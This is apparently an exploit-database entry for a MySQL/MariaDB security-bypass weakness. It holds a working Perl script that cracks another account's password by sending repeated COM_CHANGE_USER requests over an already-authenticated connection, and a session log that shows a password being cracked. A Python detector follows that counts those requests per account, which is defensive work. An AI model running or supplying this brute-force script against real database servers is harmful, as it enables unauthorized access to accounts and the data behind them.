source: https://www.securityfocus.com/bid/56837/info
MySQL and MariaDB are prone to a security-bypass weakness.
An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible.
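use Net::MySQL;
$| = 1;    # unbuffered output

# Authenticate once with a known account
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'test',
    user     => "user",
    password => "secret",
    debug    => 0,
);
$crackuser = "crackme";

# Candidate passwords are read from standard input, one per line
while (<stdin>) {
    chomp;
    $currentpass = $_;
    # Request body: user name, NUL, 0x14 (length 20), scrambled password, NUL
    $vv = join "\0",
        $crackuser,
        "\x14" .
        Net::MySQL::Password->scramble($currentpass, $mysql->{salt}, $mysql->{client_capabilities}) . "\0";
    # Command 0x11 (COM_CHANGE_USER) is sent on the already-authenticated connection
    if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
    }
}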
---
example session:
C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted
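
Detection side, as an added example that is not part of the original advisory: the script above sends command byte 0x11 (COM_CHANGE_USER) over and over on one connection, so a monitor that reassembles the client-to-server bytes of a MySQL connection can count those requests per target account. The function names, the threshold of 5 and the sample stream are assumptions made for this illustration; the sample bytes are constructed, not captured.

```python
from collections import Counter

COM_CHANGE_USER = 0x11  # command byte the script above passes to _execute_command

def client_packets(stream):
    """Yield (sequence_id, payload) for each MySQL packet in a client-to-server stream."""
    pos = 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")  # 3-byte payload length
        seq = stream[pos + 3]                                   # 1-byte sequence id
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) < length:
            break  # capture ends mid-packet; ignore the partial tail
        yield seq, payload
        pos += 4 + length

def change_user_attempts(stream):
    """Count COM_CHANGE_USER requests per target account name."""
    counts = Counter()
    for seq, payload in client_packets(stream):
        # Command packets start a new exchange with sequence id 0; the login
        # response (sequence id 1) is skipped so its flag bytes are not misread.
        if seq != 0 or payload[:1] != bytes([COM_CHANGE_USER]):
            continue
        user = payload[1:].split(b"\0", 1)[0].decode("latin-1")
        counts[user] += 1
    return counts

def flag_bruteforce(stream, threshold=5):
    """Return accounts targeted by at least `threshold` change-user requests (assumed limit)."""
    return {u: n for u, n in change_user_attempts(stream).items() if n >= threshold}

def make_packet(payload, seq=0):
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload

def sample_stream():
    # Constructed sample: one query, eight change-user requests for "crackme"
    # with dummy 20-byte responses, and one ordinary change-user for "app".
    pkts = [make_packet(b"\x03SELECT 1")]
    for i in range(8):
        pkts.append(make_packet(b"\x11crackme\0\x14" + bytes([i]) * 20 + b"\0"))
    pkts.append(make_packet(b"\x11app\0\x14" + b"\xaa" * 20 + b"test\0"))
    return b"".join(pkts)

if __name__ == "__main__":
    print(flag_bruteforce(sample_stream()))
```

A single change-user request is normal for connection pools, so the count per connection is the signal rather than the presence of the command.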